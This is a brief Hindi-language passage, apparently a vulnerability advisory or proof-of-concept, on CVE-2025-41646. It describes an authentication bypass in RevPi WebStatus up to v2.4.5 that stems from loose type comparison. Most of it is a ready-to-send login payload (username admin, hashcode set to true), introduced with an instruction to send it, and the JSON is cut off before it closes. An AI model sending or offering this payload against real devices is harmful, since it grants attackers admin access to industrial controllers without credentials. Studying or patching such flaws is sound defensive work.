
CVE-2025-41646 - गंभीर प्रमाणीकरण बाईपास
CVE-2025-41646 - गंभीर प्रमाणीकरण बाईपास
RevPi WebStatus ≤ v2.4.5 में एक गंभीर प्रमाणीकरण बाईपास भेद्यता (CVE-2025-41646), कमजोर टाइप तुलना तर्क (== बनाम ===) के कारण, किसी हमलावर को मान्य क्रेडेंशियल्स के बिना admin के रूप में लॉग इन करने की अनुमति देती है।
इसके साथ एक लॉगिन अनुरोध भेजें:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true